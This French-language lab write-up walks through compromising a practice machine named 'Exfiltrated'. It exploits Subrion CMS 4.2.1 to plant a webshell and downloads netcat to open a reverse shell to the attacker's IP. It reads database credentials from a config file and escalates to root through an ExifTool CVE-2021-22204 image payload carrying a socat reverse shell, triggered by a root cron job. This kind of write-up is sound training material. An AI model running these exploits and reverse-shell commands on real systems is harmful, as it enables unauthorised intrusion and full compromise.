# Exfiltrated

`subrion` `suid` `exiftool`

* Nom machine : Exfiltrated
* Difficulté : Facile
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 17:07 EDT
Nmap scan report for 192.168.210.163
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

En tappant l'IP dans le navigateur, on nous donne un nom de domaine : nous allons l'ajouter au fichier /etc/hosts.

Via Panel, nous pouvons nous connecter en tant qu' admin:admin. Nous avons également l numéro de version : Subrion CMS 4.2.1

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FXsZIgAtytadoeOEmvBf3%2F345b1306fa31496b567295bb9a1e16ba.png?alt=media&#x26;token=15f7cd4a-841d-49c6-8f8e-3bf5df4b9c43" alt=""><figcaption></figcaption></figure>

Nous trouvons un exploit

## Accès initial

{% embed url="<https://www.exploit-db.com/exploits/49876>" %}

```
┌──(kali㉿kali)-[~/oscp/exfil]
└─$ python exploit.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: 73pF2noeCOmx40FfdlADpqOAmswX8NbbfI72C1d6
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: ifdmtybatjjebua

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/ifdmtybatjjebua.phar 

$ ls
ifdmtybatjjebua.phar

$ whoami
www-data
```

Nous allons améliorer notre shell. Nous avons lancé un serveur web python sur notre machine au port 80 ainsi qu'un listeneur sur le port 1234.

```
$ wget http://192.168.45.156/Tools/nc
$ chmod 777 nc
$ $ ./nc 192.168.45.156 1234 -e /bin/bash
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.156] from (UNKNOWN) [192.168.210.163] 45380
cd /home
ls
coaran
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

## Elévation des privilèges

Après recherche sur internet des crédentials se trouvent à includes/config.inc.php

```
www-data@exfiltrated:/var/www/html/subrion/includes$ cat config.inc.php
cat config.inc.php
<?php
/*
 * Subrion Open Source CMS 4.2.1
 * Config file generated on 10 June 2021 12:04:54
 */

define('INTELLI_CONNECT', 'mysqli');
define('INTELLI_DBHOST', 'localhost');
define('INTELLI_DBUSER', 'subrionuser');
define('INTELLI_DBPASS', 'target100');
define('INTELLI_DBNAME', 'subrion');
define('INTELLI_DBPORT', '3306');
define('INTELLI_DBPREFIX', 'sbr421_');

define('IA_SALT', '#5A7C224B51');

// debug mode: 0 - disabled, 1 - enabled
define('INTELLI_DEBUG', 0);
```

```
www-data@exfiltrated:/var/www/html/subrion/includes$ mysql -u subrionuser -p
mysql -u subrionuser -p
Enter password: target100

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 138
Server version: 10.3.29-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
```

Rien d'intéressant, le seul utilisateur est admin.

```
www-data@exfiltrated:/var/www/html/subrion/includes$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *	* * *	root	bash /opt/image-exif.sh
```

```
cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata 

echo -ne "\\n metadata directory cleaned! \\n\\n"


IMAGES='/var/www/html/subrion/uploads'

META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"

echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename; 
do 
    exiftool "$IMAGES/$filename" >> $LOGFILE 
done

echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
```

<https://github.com/UNICORDev/exploit-CVE-2021-22204>

```
┌──(kali㉿kali)-[~/oscp/exfil]
└─$ python script.py -c 'socat TCP:192.168.45.156:1235 EXEC:/bin/bash'

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
PAYLOAD: (metadata "\c${system('socat TCP:192.168.45.156:1235 EXEC:/bin/bash')};")
DEPENDS: Dependencies for exploit are met!
PREPARE: Payload written to file!
PREPARE: Payload file compressed!
PREPARE: DjVu file created!
PREPARE: JPEG image created/processed!
PREPARE: Exiftool config written to file!
EXPLOIT: Payload injected into image!
CLEANUP: Old file artifacts deleted!
SUCCESS: Exploit image written to "image.jpg"
```

On le télécharge dans le dossier upload de la cible, on lance un listeneur puis on attend que me cron s'exécute.

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235
listening on [any] 1235 ...
connect to [192.168.45.156] from (UNKNOWN) [192.168.210.163] 56658
whoami
root
```